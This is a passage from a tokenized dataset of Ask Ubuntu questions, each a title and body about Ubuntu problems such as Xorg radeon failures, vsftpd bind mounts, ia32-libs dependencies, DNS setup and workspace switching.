) , ati firepro v3750 ( firegl ) , ati mobility radeon hd 4830 , ati mobility radeon hd 4850 , ati firepro m7740 , ati rv740 , ati radeon hd 4770 , ati radeon hd 4700 series , ati radeon hd 4770 , ati firepro m5750 , ati rv610 , ati radeon hd 2400 xt , ati radeon hd 2400 pro , ati radeon hd 2400 pro agp , ati firegl v4000 , ati rv610 , ati radeon hd 2350 , ati mobility radeon hd 2400 xt , ati mobility radeon hd 2400 , ati radeon e2400 , ati rv610 , ati firemv 2260 , ati rv670 , ati radeon hd3870 , ati mobility radeon hd 3850 , ati radeon hd3850 , ati mobility radeon hd 3850 x2 , ati rv670 , ati mobility radeon hd 3870 , ati mobility radeon hd 3870 x2 , ati radeon hd3870 x2 , ati firegl v7700 , ati radeon hd3850 , ati radeon hd3690 , amd firestream 9170 , ati radeon hd 4550 , ati radeon rv710 , ati radeon rv710 , ati radeon rv710 , ati radeon hd 4350 , ati mobility radeon 4300 series , ati mobility radeon 4500 series , ati mobility radeon 4500 series , ati firepro rg220 , ati mobility radeon 4330 , ati rv630 , ati mobility radeon hd 2600 , ati mobility radeon hd 2600 xt , ati radeon hd 2600 xt agp , ati radeon hd 2600 pro agp , ati radeon hd 2600 xt , ati radeon hd 2600 pro , ati gemini rv630 , ati gemini mobility radeon hd 2600 xt , ati firegl v5600 , ati firegl v3600 , ati radeon hd 2600 le , ati mobility firegl graphics processor , ati radeon hd 3470 , ati mobility radeon hd 3430 , ati mobility radeon hd 3400 series , ati radeon hd 3450 , ati radeon hd 3450 , ati radeon hd 3430 , ati radeon hd 3450 , ati firepro v3700 , ati firemv 2450 , ati firemv 2260 , ati firemv 2260 , ati radeon hd 3600 series , ati radeon hd 3650 agp , ati radeon hd 3600 pro , ati radeon hd 3600 xt , ati radeon hd 3600 pro , ati mobility radeon hd 3650 , ati mobility radeon hd 3670 , ati mobility firegl v5700 , ati mobility firegl v5725 , ati radeon hd 3200 graphics , ati radeon 3100 graphics , ati radeon hd 3200 graphics , ati radeon 3100 graphics , ati radeon hd 3300 graphics , ati radeon hd 3200 graphics , ati radeon 3000 graphics , sumo , sumo , sumo2 , sumo2 , sumo2 , sumo2 , sumo , sumo , sumo , sumo , sumo , sumo , sumo , sumo , ati radeon hd 4200 , ati radeon 4100 , ati mobility radeon hd 4200 , ati mobility radeon 4100 , ati radeon hd 4290 , ati radeon hd 4250 , amd radeon hd 6310 graphics , amd radeon hd 6310 graphics , amd radeon hd 6250 graphics , amd radeon hd 6250 graphics , amd radeon hd 6300 series graphics , amd radeon hd 6200 series graphics , palm , palm , palm , cypress , ati firepro ( firegl ) graphics adapter , ati firepro ( firegl ) graphics adapter , ati firepro ( firegl ) graphics adapter , amd firestream 9370 , amd firestream 9350 , ati radeon hd 5800 series , ati radeon hd 5800 series , ati radeon hd 5800 series , ati radeon hd 5800 series , ati radeon hd 5900 series , ati radeon hd 5900 series , ati mobility radeon hd 5800 series , ati mobility radeon hd 5800 series , ati firepro ( firegl ) graphics adapter , ati firepro ( firegl ) graphics adapter , ati mobility radeon hd 5800 series , ati radeon hd 5700 series , ati radeon hd 5700 series , ati radeon hd 6700 series , ati radeon hd 5700 series , ati radeon hd 6700 series , ati mobility radeon hd 5000 series , ati mobility radeon hd 5000 series , ati mobility radeon hd 5570 , ati firepro ( firegl ) graphics adapter , ati firepro ( firegl ) graphics adapter , ati radeon hd 5670 , ati radeon hd 5570 , ati radeon hd 5500 series , redwood , ati mobility radeon hd 5000 series , ati mobility radeon hd 5000 series , ati mobility radeon graphics , ati mobility radeon graphics , cedar , ati firepro ( firegl ) graphics adapter , ati firepro ( firegl ) graphics adapter , ati firepro 2270 , cedar , ati radeon hd 5450 , cedar , cedar , cayman , cayman , cayman , cayman , cayman , cayman , cayman , cayman , cayman , cayman , amd radeon hd 6900 series , amd radeon hd 6900 series , cayman , cayman , cayman , amd radeon hd 6900m series , mobility radeon hd 6000 series , barts , barts , mobility radeon hd 6000 series , mobility radeon hd 6000 series , barts , barts , barts , barts , amd radeon hd 6800 series , amd radeon hd 6800 series , amd radeon hd 6700 series , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , turks , caicos , caicos , caicos , caicos , caicos , caicos , caicos , caicos , caicos , caicos , caicos , caicos , caicos , caicos , caicos , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , aruba , tahiti , tahiti , tahiti , tahiti , tahiti , tahiti , tahiti , tahiti , tahiti , tahiti , tahiti , tahiti , tahiti , pitcairn , pitcairn , pitcairn , pitcairn , pitcairn , pitcairn , verde , verde , verde , oland , oland , oland , oland , oland , oland , oland , oland , oland , oland , oland , oland , oland , hainan , hainan , hainan , hainan , hainan , hainan , bonaire , bonaire , bonaire , bonaire , bonaire , bonaire , bonaire , bonaire , kabini , kabini , kabini , kabini , kabini , kabini , kabini , kabini , kabini , kabini , kabini , kabini , kabini , kabini , kabini , kabini [ 69.683 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 69.683 ] ( ii ) modesetting : driver for modesetting kernel drivers : kms [ 69.683 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 69.683 ] ( -- ) using vt number 7 [ 69.685 ] ( ii ) [ kms ] drm report modesetting is n't supported . [ 69.685 ] vesa : ignoring device with a bound kernel driver [ 69.685 ] vesa : ignoring device with a bound kernel driver [ 69.685 ] ( ww ) falling back to old probe method for vesa [ 69.685 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 69.685 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 69.685 ] ( ww ) falling back to old probe method for modesetting [ 69.685 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 69.685 ] ( ee ) open /dev/dri/card0 : no such file or directory [ 69.685 ] ( ii ) loading sub module `` fbdevhw '' [ 69.685 ] ( ii ) loadmodule : `` fbdevhw '' [ 69.685 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 69.685 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 69.685 ] compiled for 1.14.3 , module version = 0.0.2 [ 69.685 ] abi class : x.org video driver , version 14.1 [ 69.685 ] ( ee ) open /dev/fb0 : no such file or directory [ 69.685 ] ( ww ) falling back to old probe method for fbdev [ 69.685 ] ( ii ) loading sub module `` fbdevhw '' [ 69.685 ] ( ii ) loadmodule : `` fbdevhw '' [ 69.686 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 69.686 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 69.686 ] compiled for 1.14.3 , module version = 0.0.2 [ 69.686 ] abi class : x.org video driver , version 14.1 [ 69.686 ] ( ee ) open /dev/fb0 : no such file or directory [ 69.686 ] ( ee ) screen 0 deleted because of no matching config section . [ 69.686 ] ( ii ) unloadmodule : `` radeon '' [ 69.686 ] ( ee ) screen 0 deleted because of no matching config section . [ 69.686 ] ( ii ) unloadmodule : `` vesa '' [ 69.686 ] ( ee ) screen 0 deleted because of no matching config section . [ 69.686 ] ( ii ) unloadmodule : `` vesa '' [ 69.686 ] ( ee ) screen 0 deleted because of no matching config section . [ 69.686 ] ( ii ) unloadmodule : `` modesetting '' [ 69.686 ] ( ee ) screen 0 deleted because of no matching config section . [ 69.686 ] ( ii ) unloadmodule : `` modesetting '' [ 69.686 ] ( ee ) screen 0 deleted because of no matching config section . [ 69.686 ] ( ii ) unloadmodule : `` fbdev '' [ 69.686 ] ( ii ) unloadsubmodule : `` fbdevhw '' [ 69.686 ] ( ee ) device ( s ) detected , but none match those in the config file . [ 69.686 ] ( ee ) fatal server error : [ 69.686 ] ( ee ) no screens found ( ee ) [ 69.686 ] ( ee ) please consult the the x.org foundation support at http : //wiki.x.org for help . [ 69.686 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 69.686 ] ( ee ) [ 69.687 ] ( ee ) server terminated with error ( 1 ) . closing log file . my graphic card : vga compatible controller : advanced micro devices , inc. [ amd/ati ] rv710/m92 [ mobility radeon hd 4330/4350/4550 ] ubuntu gnome 13.10 x64 . i also erased my whole drive instead of just first partition ( change windows 7 to ubuntu option in installation wizard did n't imply doing this ! ) i 'm currently on live usb stick , and i 'm stuck here . thanks for help
367959	make mirrored display default with a projector in 13.10	i updated my boss 's laptop ( system76 galago ) from 13.04 to 13.10 , and now when he hooks up to the projector the default setting does not mirror the display on his main screen . it 's easily fixed by going into settings > display > check box mirror displays , but he hates going through the settings . i was wondering if there is any way i can make mirroring be the default so that he does n't have to ? ( it does n't remember the box having been checked previously between hook-ups . ) i 'm not sure why the default changed because of the update , because in 13.04 it always mirrored by default . thank you for your help and suggestions ! !
367961	no notifications from notify-osd on 13.10	i recently upgraded to 13.10 . notify-osd works correctly ( $ notify-send test # sends correctly the notification using gnome-shell style ) , but i 'm not able to get notifications on volume up/down , next/previous track , brightness up/down , cd ejection events . this used to work on 13.04 . i 'm using gnome-flashback-session , this might me a part of the answer . thank you !
367963	ubuntu on lenovo yoga 2 pro	is it possible to install ubuntu on the new lenovo yoga 2 pro ? i have checked the lenovo compatibility lists on the ubuntu site , but no new entries have been created yet for this model ( released mid-october ) .
367964	uget tray icon not showing	since i upgraded to saucy , uget is not showing in the system tray , although the always show tray icon option in uget settings is checked . p.s . this happens only with uget , all the other softwares have working tray icons ( vlc , qbittorrent.. ) here is the snapshot which shows the settings of uget : sudo dpkg -l | grep -e `` ^rc '' -e `` ^iu '' : rc account-plugin-generic-oauth 0.10bzr13.03.26-0ubuntu1.1 i386 gnome control center account plugin for single signon - generic oauth rc appmenu-gtk : i386 12.10.3daily13.04.03-0ubuntu1 i386 export gtk menus over dbus rc appmenu-gtk3 : i386 12.10.3daily13.04.03-0ubuntu1 i386 export gtk menus over dbus rc arora 0.11.0-0ubuntu1 i386 simple cross platform web browser rc buc 0.5.2-20 i386 buc rc clementine 1.1.1+dfsg-2ubuntu1 i386 modern music player and library organizer rc epiphany-browser 3.6.1-2ubuntu1 i386 intuitive gnome web browser rc epiphany-browser-data 3.6.1-2ubuntu3 all data files for the gnome web browser rc fancontrol 1:3.3.3-1ubuntu1 all utilities to read temperature/voltage/fan sensors rc flaremonitor 1.0-5 i386 it is an advanced browser integration helper module of flareget rc google-chrome-stable 28.0.1500.95-r213514 i386 the web browser from google rc hal 0.5.14-8ubuntu1 i386 hardware abstraction layer rc hotot-gtk 1:0.9.8.5+git20120630.884797d-1 all lightweight microblogging client - gtk+ wrapper rc jockey-common 0.9.7-0ubuntu13 all user interface and desktop integration for driver management rc libanalitza4abi1 4:4.10.4-0ubuntu0.1 i386 library to work with mathematical expressions rc libanalitza5 4:4.11.2-0ubuntu1 i386 library to work with mathematical expressions rc libanalitzagui4abi2 4:4.10.4-0ubuntu0.1 i386 library to work with mathematical expressions - gui routines rc libanalitzaplot4 4:4.10.4-0ubuntu0.1 i386 library to work with mathematical expressions - plot routines rc libavcodec53 : i386 6:0.8.6-1ubuntu2 i386 libav codec library rc libavutil51 : i386 6:0.8.6-1ubuntu2 i386 libav utility library rc libbamf3-1 : i386 0.4.0daily13.06.19~13.04-0ubuntu1 i386 window matching library - shared library rc libboost-iostreams1.49.0 1.49.0-4 i386 boost.iostreams library rc libboost-program-options1.49.0 1.49.0-4 i386 program options library for c++ rc libboost-python1.49.0 1.49.0-4 i386 boost.python library rc libboost-thread1.49.0 1.49.0-4 i386 portable c++ multi-threading rc libbrlapi0.5 : i386 4.4-8ubuntu4 i386 braille display access via brltty - shared library rc libcamel-1.2-40 3.6.4-0ubuntu1.1 i386 evolution mime message handling library rc libcolumbus0-0 0.4.0daily13.04.16~13.04-0ubuntu1 i386 error tolerant matching engine - shared library rc libdns95 1:9.9.2.dfsg.p1-2ubuntu2.1 i386 dns shared library used by bind rc libdvbpsi7 0.2.2-1 i386 library for mpeg ts and dvb psi tables decoding and generating rc libebackend-1.2-5 3.6.4-0ubuntu1.1 i386 utility library for evolution data servers rc libechonest2.0 : i386 2.0.2-0ubuntu1 i386 qt library for communicating with the echo nest platform rc libechonest2.1 : i386 2.1.0-2 i386 qt library for communicating with the echo nest platform rc libedata-book-1.2-15 3.6.4-0ubuntu1.1 i386 backend library for evolution address books rc libedata-cal-1.2-18 3.6.4-0ubuntu1.1 i386 backend library for evolution calendars rc libftgl2 2.1.3~rc5-4ubuntu1 i386 library to render text in opengl using freetype rc libgc1c3 : i386 1:7.2d-0ubuntu5 i386 conservative garbage collector for c and c++ rc libgnome-desktop-3-4 3.6.3-0ubuntu1 i386 utility library for loading .desktop files - runtime files rc libgtksourceview-3.0-0 : i386 3.6.3-0ubuntu1 i386 shared libraries for the gtk+ syntax highlighting widget rc libgweather-3-1 3.6.2-0ubuntu1 i386 gweather shared library rc libhal-storage1 0.5.14-8ubuntu1 i386 hardware abstraction layer - shared library for storage devices rc libhal1 0.5.14-8ubuntu1 i386 hardware abstraction layer - shared library rc libharfbuzz0 : i386 0.9.13-1 i386 opentype text shaping engine rc libhd16 16.0-2.2 i386 hardware identification system library rc libibus-1.0-0 : i386 1.4.2-0ubuntu2 i386 intelligent input bus - shared library rc libical0 0.48-2 i386 icalendar library implementation in c ( runtime ) rc libimobiledevice3 1.1.4-1ubuntu6.2 i386 library for communicating with the iphone and ipod touch rc libisc92 1:9.9.2.dfsg.p1-2ubuntu2.1 i386 isc shared library used by bind rc libkdegamesprivate1 4:4.10.2-0ubuntu1 i386 private shared library for kde games rc libkeybinder0 0.3.0-1ubuntu1 i386 registers global key bindings for applications rc libkgapi0 : i386 0.4.4-0ubuntu1 i386 google api library for kde rc liblastfm1 : i386 1.0.7-2 i386 last.fm web services library rc libnetfilter-queue1 1.0.2-1 i386 netfilter netlink-queue library rc libnl1 : i386 1.1-7ubuntu1 i386 library for dealing with netlink sockets rc libossp-uuid16 1.6.2-1.3 i386 ossp uuid iso-c and c++ - shared library rc libpackagekit-glib2-14 : i386 0.7.6-3ubuntu1 i386 library for accessing packagekit using glib rc libpoppler28 : i386 0.20.5-1ubuntu3 i386 pdf rendering library rc libprojectm2 2.1.0+dfsg-1build1 i386 advanced milkdrop-compatible music visualization library rc libqxt-core0 : i386 0.6.1-7 i386 extensions to qt core classes ( libqxt ) rc libqxt-gui0 : i386 0.6.1-7 i386 extensions to qt gui classes ( libqxt ) rc libraw5 : i386 0.14.7-0ubuntu1.13.04.2 i386 raw image decoder library rc librhythmbox-core6 2.98-0ubuntu5 i386 support library for the rhythmbox music player rc librhythmbox-core7 3.0.1-0~13.10~ppa1 i386 support library for the rhythmbox music player rc libsnmp15 5.4.3~dfsg-2.7ubuntu1 i386 snmp ( simple network management protocol ) library rc libsqlite0 2.8.17-8fakesync1 i386 sqlite shared library rc libsyncdaemon-1.0-1 4.2.0-0ubuntu1 i386 ubuntu one synchronization daemon library rc libtiff4 : i386 3.9.7-2ubuntu1 i386 tag image file format ( tiff ) library ( old version ) rc libunity-core-6.0-5 7.0.0daily13.06.19~13.04-0ubuntu1 i386 core library for the unity interface . rc libva-wayland1 : i386 1.2.1-0ubuntu0~raring i386 video acceleration ( va ) api for linux -- wayland runtime rc libwayland0 : i386 1.0.5-0ubuntu1 i386 wayland compositor infrastructure - shared libraries rc libwebp2 : i386 0.1.3-3 i386 lossy compression of digital photographic images . rc linux-image-3.8.0-19-generic 3.8.0-19.30 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-3.8.0-21-generic 3.8.0-21.32 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-3.8.0-22-generic 3.8.0-22.33 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-3.8.0-26-generic 3.8.0-26.38 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-3.8.0-27-generic 3.8.0-27.40 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-3.9.0-030900-generic 3.9.0-030900.201304291257 i386 linux kernel image for version 3.9.0 on 32 bit x86 smp rc linux-image-3.9.0-030900rc8-generic 3.9.0-030900rc8.201304211835 i386 linux kernel image for version 3.9.0 on 32 bit x86 smp rc linux-image-extra-3.8.0-19-generic 3.8.0-19.30 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-extra-3.8.0-21-generic 3.8.0-21.32 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-extra-3.8.0-22-generic 3.8.0-22.33 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-extra-3.8.0-26-generic 3.8.0-26.38 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc linux-image-extra-3.8.0-27-generic 3.8.0-27.40 i386 linux kernel image for version 3.8.0 on 32 bit x86 smp rc preload 0.6.4-2 i386 adaptive readahead daemon rc steam-launcher 1.0.0.39 all launcher for the steam software distribution service rc super-boot-manager 0.7.15 all simple gui to configure grub2 , burg and plymouth . rc totem 3.6.3-0ubuntu6 i386 simple media player for the gnome desktop based on gstreamer rc transmission-gtk 2.77-0ubuntu1 i386 lightweight bittorrent client ( gtk interface ) rc unity-common 7.0.0daily13.06.19~13.04-0ubuntu1 all common files for the unity interface . rc vino 3.6.2-0ubuntu4 i386 vnc server for gnome rc wicd-daemon 1.7.2.4-4.1 all wired and wireless network manager - daemon rc wicd-gtk 1.7.2.4-4.1 all wired and wireless network manager - gtk+ client rc xscreensaver 5.15-2ubuntu1 i386 automatic screensaver for x rc xscreensaver-data 5.15-3ubuntu1 i386 data files to be shared among screensaver frontends sudo dpkg -l | grep uget : ii uget 1.10.3-1 i386 easy-to-use download manager written in gtk+ sudo dpkg -l | grep indicator : ii gir1.2-appindicator3-0.1 12.10.1+13.10.20130920-0ubuntu2 i386 typelib files for libappindicator3-1 . ii gir1.2-syncmenu-0.1 12.10.5+13.10.20131011-0ubuntu1 i386 indicator for synchronisation processes status - bindings ii indicator-applet-complete 12.10.2+13.10.20130924.2-0ubuntu1 i386 clone of the gnome panel indicator applet ii indicator-application 12.10.1daily13.01.25-0ubuntu1 i386 application indicators ii indicator-appmenu 13.01.0+13.10.20130930-0ubuntu1 i386 indicator for application menus . ii indicator-bluetooth 0.0.6+13.10.20131016-0ubuntu1 i386 system bluetooth indicator . ii indicator-datetime 13.10.0+13.10.20131023.2-0ubuntu1 i386 simple clock ii indicator-keyboard 0.0.0+13.10.20131010.1-0ubuntu1 i386 keyboard indicator ii indicator-messages 13.10.1+13.10.20131011-0ubuntu1 i386 indicator that collects messages that need a response ii indicator-multiload 0.3-0ubuntu1 i386 graphical system load indicator for cpu , ram , etc . ii indicator-power 12.10.6+13.10.20131008-0ubuntu1 i386 indicator showing power state . ii indicator-printers 0.1.7daily13.03.01-0ubuntu1 i386 indicator showing active print jobs ii indicator-session 12.10.5+13.10.20131023.1-0ubuntu1 i386 indicator showing session management , status and user switching ii indicator-sound 12.10.2+13.10.20131011-0ubuntu1 i386 system sound indicator . ii indicator-sync 12.10.5+13.10.20131011-0ubuntu1 i386 indicator for synchronisation processes status ii libappindicator1 12.10.1+13.10.20130920-0ubuntu2 i386 application indicators ii libappindicator3-1 12.10.1+13.10.20130920-0ubuntu2 i386 application indicators ii libindicator3-7 12.10.2+13.10.20130913-0ubuntu2 i386 panel indicator applet - shared library ii libindicator7 12.10.2+13.10.20130913-0ubuntu2 i386 panel indicator applet - shared library ii libsync-menu1 : i386 12.10.5+13.10.20131011-0ubuntu1 i386 indicator for synchronisation processes status - libraries ii python-appindicator 12.10.1+13.10.20130920-0ubuntu2 i386 python bindings for libappindicator ii sni-qt : i386 0.2.6-0ubuntu1 i386 indicator support for qt ii telepathy-indicator 0.3.1daily13.06.19-0ubuntu1 i386 desktop service to integrate telepathy with the messaging menu .
367966	vsftpd and mounted directory	i have an ftp server running vsftpd on natty ( 11.04 ) . i can access with a local user ( who can see/edit freely every folder of the machine ) and use it when accessing from sftp to upload/download some configuration files . i also have enabled the anonymous account with restricted access to home/user/ftp_share folder ; this account can read the file i put in that folder . i have 3 hard drives attached to the server ( sdb1 , sdc1 , sdd1 mounted as bighd , mybook , elements in /media ) and i would like to have read access to these hard drives when logging with the anonymous user . obviously symlinking the drives did not work so i mounted them in the ftp_share folder with : sudo mount -- bind /media/elements /home/user/ftp_share/elements when logging in as anonymous i can see the folder but if i try to access it i get ftp 550 error ( failed to change directory ) . i tried giving 775 to both /media/elements and the mounting point with no results . for testing purposes i created two folder sudo mkdir /home/prova mkdir /home/user/test and both can be accessed with the anonymous user when mounted in ftp_share ( without having to edit rights or anything ) so i guess the problem is related with the folders i 'm trying to mount . googling around gave no result , so here i am ... thanks for any help you may give me ! franz
367967	12.04 nvidia twinview is disabled	im was trying to get my two monitors running in twinview at nvidia x-server settings but thw twinview option is disabled ... i can only set it up seperated x screens and xinerama which breaks my unity 3d with compiz . nvidia x-server settings detects my two monitors fine but im not able to choose anything else as `` disabled '' or `` seperate x screens '' running : 12.04 unity gtx 690 intel i7 extreme 3970x nvidia driver 304 any hints will be welcome . p.s . : i know i could add that manually to my xorg.conf but i would like to know why my twinview option is completely disabled .
367968	lib32asound : dependency is not satisfiable	i 'm using ubuntu 13.10 and i 'm getting this error when i try to install teamviewer , the error is dependency is not satisfiable lib32asound2 i already tired sudo apt-get install libasound2 : i386 but no good .
367972	is it possible to install qt4 without installing qt4-doc ?	i am compiling a software from source ( bibletime 2.9.2 ) and among the requirements is qt4.5+ . i found a way to do that by installing all the required packages at a tutorial at http : //eyemeansit.wordpress.com/2013/07/04/compiling-bibletime-2-9-2-in-linux-mint-15/ and started the installation process . i have a very slow internet connection hence every byte downloaded counts . i saw that the qt4-doc package is 96.8mb which being a documentation , i do n't really need and it will take several hours to download fully . in comes the question - is it possible to install qt4 without installing qt4-doc or maybe even the demos ? i have no plans of developing in qt4 . here 's the original command ( i have removed some packages to save on space ) : sudo apt-get install qt4-designer qt4-demos qt4-doc qt4-dev-tools libqt4-dev after removing 'qt4-doc ' from that command and pressing enter , it reads the package lists and then is added back to the 'the following extra packages will be installed : ' category .
367978	list distributions default programs with short description	i was wondering how one can list ( or if there is an online list ) of most important/popular ( alternatively all ) default installed programs/packages in ubuntu ? i know how to list packages , but many i do n't know what they do . something like this , but for the actually installed system ( in my case 13.10 ) : https : //help.ubuntu.com/community/listofopensourceprograms is it possible to generate , of course maybe not by category ? thanks ! t
367979	how to make cairo-dock icons not to hide	how to make my cairo-dock icons not to hide ( always shown ) .
367980	bluetooth dongle on 10.04 does not echo l2cap packets	i am using a rocket fishbluetooth dongle from bestbuy that is based on a broadcom chipset . it seems to work just fine except that when i l2ping the device from another bluetooth device i get : $ hcitool scan scanning ... 00:02:76:5a:71:8f ubuntu1004 $ l2ping 00:02:76:5a:71:8f ca n't connect : connection reset by peer $ is ubuntu set up by default to allow the l2cap echo request ? thanks ,
367983	how do i enable ctrl-alt-backspace to kill the x server ?	unfortunately , there 's still a need to kill the xserver from time to time . since upgrading to raring ctrl+alt+backspace is disabled and i ca n't find this option in the keyboard settings any-more : how can i enable ctrl+alt+backspace ? is there a way to re-enable it in raring ?
367984	why tomcat process uses so many ports ?	~ $ sudo netstat -utlpn | grep 2155 tcp6 0 0 : ::42851 : : : * listen 2155/java tcp6 0 0 : ::58212 : : : * listen 2155/java tcp6 0 0 : ::9092 : : : * listen 2155/java tcp6 0 0 : ::47556 : : : * listen 2155/java tcp6 0 0 127.0.0.1:8005 : : : * listen 2155/java tcp6 0 0 : ::8999 : : : * listen 2155/java tcp6 0 0 : ::45131 : : : * listen 2155/java tcp6 0 0 : ::8080 : : : * listen 2155/java tcp6 0 0 : ::47998 : : : * listen 2155/java where 2155 is the pid of tomcat process . port 8080 is set in connector in the `` server.xml '' file . i know that port 8005 is used to shutdown tomcat . i set jmx to listen on port 8999 . i do n't know why tomcat uses other ports .
367985	but i did n't use /etc/init.d/ in my command !	how can i get this command to work again ? $ service tftpd-hpa -start rather than invoking init scripts through /etc/init.d , use the service ( 8 ) utility , e.g . service tftpd-hpa -start the script you are attempting to invoke has been converted to an upstart job , but -start is not supported for upstart jobs .
367989	set imap folder path prefix on server side with courier	i 've successfully setup a vps as a mail server following this tutorial : http : //www.howtoforge.com/virtual-users-and-domains-with-postfix-courier-mysql-and-squirrelmail-ubuntu-12.04-lts most everything is working now , but one annoyance i 'm having is that when i connect to my mail account through thunderbird all my mail folders ( send , drafts , etc ) are organized as a sub-folder of inbox . i 've been able to fix this in thunderbird by going into account settings and setting the imap folder path prefix to `` inbox '' . this solution , however , is n't ideal . i 'd like to not have to do this on every client i connect with , for every account that connects . does anyone know if it 's possible to configure this in courier on the server side so that it gets set automatically ? are there any other options that would solve this problem ?
367990	12.04 . only boots throught recovery mode	i installed ubuntu 12.04 lts ( desktop ) `` succesfully '' . but when i try to boot straight up , all i get is a purple screen with a blak line on the left . i then go to recovery-mode , and select `` resume normal boot '' , and then ubuntu loads up fine . i 've read that it could be bug in the grub ? i do n't know what grub means , but i tried this : http : //www.youtube.com/watch ? v=8lod8srb_6i it did n't work . i do n't have any other partitions on the pc , and i selected `` nomodeset '' when i installed ubuntu . any idea how to get this right ?
367993	changing sound device does nothing	i plugged in my usb headset , and selected it in the sound settings : but sounds still played through my laptop 's built-in speakers . nothing comes through the headset at all . it worked fine before i upgraded from 13.04 to 13.10 , and it works fine in windows . why is it not working , and how can i make it work again ? update : i was able to change devices with the pulseaudio volume control application , but the default sound settings window still does n't seem to work right . i would still like to know why this happens because it 's inconvenient . i spoke too soon . that made it look like sound was going headphones , but it really was not ( although it did mute the built-in speakers . ) also , the volume wheel on the headset still works , even though it affects the built-in speakers .
367994	ia32-libs package not found intalling adobe air	i need to install adobe air in my ubuntu 13.10 x64 . the installation shows this error , dpkg : dependency problems prevent configuration of adobeair : adobeair depends on ia32-libs ; however : package ia32-libs is not installed . now i tried to install ia32-libs , sudo dpkg -- add-architecture i386 sudo apt-get update sudo apt-get install ia32-libs now the error shows , e : package 'ia32-libs ' has no installation candidate and also tried , sudo apt-get install ia32-libs : i386 sudo apt-get install ia32-libs-multiarch : i386 sudo apt-get install ia32-libs-multiarch sudo apt-get install libc6 : i386 libgcc1 : i386 gcc-4.6-base : i386 libstdc++5 : i386 libstdc++6 : i386 is there any working solution ? this solution also not working for me .
367997	xubuntu 13.10 pulseaudio error	i have just installed xubuntu 13.10 and everything seems ok but pulseaudio . the sound works fine but the pulse audio icon in the notification area is not working , i ca n't get to the sound options nor control banshee . this is the same problem , but the fix does n't work for me : volume indicator issue after xubuntu 13.10 upgrade
367998	automatic screen brightnes	i know this question have been asked many times but i really cant get it to work . i just installed ubuntu 13.10 on my lenovo g580 laptop and i 'm trying to manage screen brightness when on battery or ac adapter . now i installed laptop-mode-tools and enabled it by appending `` laptop_mode_enabled=true '' in the `` /etc/default/acpi-support '' next i configured the `` /etc/laptop-mode/conf.d/lcd-brightness.conf '' configuration file in this format : control_brightness=1 # # commands to execute to set the brightness on your lcd # batt_brightness_command= '' echo 7 '' lm_ac_brightness_command= '' echo 11 '' nolm_ac_brightness_command= '' echo 11 '' brightness_output= '' /sys/class/backlight/acpi_video0/brightness '' but it has no effect after rebooting many times , so please does any one has solution for this ?
367999	bluetooth does not detect device	i have dell inspiron 3521 and ubuntu 12.04 . wireless is working perfectly but bluetooth does not detect any device . result of sudo rfkill list is 0 : hci0 : bluetooth soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no please help me regarding this . thank you .
368003	dns - hosting domain - ip provided by isp	first of all , i am really sorry , still new on the use of ubuntu and server administration . but i am eager to learn ! i purchased an unmanaged vps server ( ubuntu 12.10 ) with 2 ip addresses + a domain name . i would like to setup the dns for my domain name to be redirected to my website ( no mail server etc ... ) . i am mostly following this tutorial : http : //news.softpedia.com/news/how-to-host-your-own-domain-with-bind9-on-ubuntu-49585.shtml and also use these tutorials for help : http : //ubuntuforums.org/showthread.php ? t=236093 and another one ... ( not enough reputation to post it here : ) ) but i have few questions : i do n't understand what is the `` dns ip address provided by your isp '' . also , when i edit my domain name ( on my host website ) , i have to set the primary nameserver and the secondary nameserver . i guess it will be like ns1.my-domain.com and ns2.my-domain.com , but which ip should i give to ns1 and which to ns2 ? in the tutorials , i never see ns2 , it 's normal because it 's not a primary ? again i am really sorry for my small knowledge . thanks in advance for your answers . best ! doudou
368004	setting screen session name in the middle of the session	screen allows to set a custom session name during a session startup using a -s switch screen -s your_session_name how to set a custom session name after a screen session has been created ?
368007	two ip address for a one mac address	can isc-dhcp-server give two static ip addresses to one mac address ? i have several home terminals in my network . each terminal have two interfaces . one for public traffic and one for a management traffic . both interfaces have same mac address . dhcp server can detect interfaces via dhcp option field and dhcp class declarations . every terminal have to have static ip address instead of dynamic address . with dynamic address and dynamic pools this would be an easy task .
368008	how to upgrade ubuntu server 11.04	i want to upgrade my ubuntu server 64bit 11.04 to ubuntu 12.04 . i tried to do it with the command : $ do-release-upgrade but the output is : checking for a new ubuntu release no new release found does anybody know what the reason might be ?
368010	use horizontal scroll to switch workspace	i 'm using ubuntu 13.10 saucy . i want to find a way to use horizontal scrolling to switch workspaces . i 'm using compiz 3d cube right now , but i 'm not horribly attached to it . i 'm looking for behavior similar to how chrome works to switch between `` most visited '' and `` apps '' on the new tab page using horizontal scroll , but for workspaces . the only reference i 've found to something like this is here : http : //iloveubuntu.net/how-easily-enable-workspace-switching-mouse-wheel-ubuntu-1110 however , that option is n't available in the current version of ubuntu tweak , and anyway it says it only works when the cursor is on the desktop ( so i ca n't do it if i have a window maximized . ) is this possible ?
